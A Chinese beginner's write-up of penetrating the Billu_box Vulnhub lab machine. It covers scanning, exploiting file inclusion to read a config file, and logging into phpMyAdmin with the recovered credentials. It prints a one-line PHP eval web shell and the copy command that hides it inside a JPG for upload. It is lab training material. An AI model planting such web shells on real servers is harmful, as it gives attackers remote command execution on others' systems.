关于小白学习渗透Billu_box过程

**

Billu_box渗透测试

**

1.1实验环境

靶机:Billu_box IP地址:192.168.237.141

测试机:Kali,IP地址:192.168.237.141;
这里呢先查看自己本身的ip,

关于小白学习渗透Billu_box过程

1.2实验流程

信息收集——主机发现、端口扫描
由于安装的虚拟机使用的NET模式 ,所以已经知道在同一网段,
实际环境中呢也是肯定要使用相同网段进行渗透测试的,直接使用工具扫描IP

1.3渗透测试

这里呢先使用Nmap扫描下,其实只开一个虚拟机 就只有它一个。
关于小白学习渗透Billu_box过程
然后访问页面

关于小白学习渗透Billu_box过程这里让输入账户密码,也许存在注入,不过还是先做下其他工作,扫描下路径和其他信息把。

关于小白学习渗透Billu_box过程这是御剑扫描出的结果,这里呢注意,单个扫描器结果可能不全面,所以多用几个对比下

关于小白学习渗透Billu_box过程关于小白学习渗透Billu_box过程

这是在Kali扫描出来的结果,对比呢比御剑多出了192.168.237.140/phpmy这个目录。下面把感觉能用的都拿出来

关于小白学习渗透Billu_box过程
关于小白学习渗透Billu_box过程
关于小白学习渗透Billu_box过程

看了一下大概能用的就这么多 ,然后再test这里存在文件包含,打开了几个文件
关于小白学习渗透Billu_box过程

关于小白学习渗透Billu_box过程这里构造POST请求发送命令,可以将文件下载下来,打开发现这个c.php里好像有账号信息 拿出来去之前phpmy
页面登录尝试

关于小白学习渗透Billu_box过程
登录成功,

关于小白学习渗透Billu_box过程
得到登陆认证的用户名以及密码

biLLu : hEx_it

关于小白学习渗透Billu_box过程

很明显 这里既然有导入和导出 ,那就不客气了 上传shell

关于小白学习渗透Billu_box过程关于小白学习渗透Billu_box过程
合成图片马 <?@php eval($_POST[cmd]);?> 生成TXT文件 找个图片 然后CMD copy 1.txt /b + 1.jpg /a 2.jpg 生成图片
抓包修改文件名称后缀,

关于小白学习渗透Billu_box过程这里通过Burp 修改命令连接,显示成功,能够遍历出文件。

上一篇:Vulnhub靶机实战-Billu_b0x


下一篇:SQL server跨服务器获取数据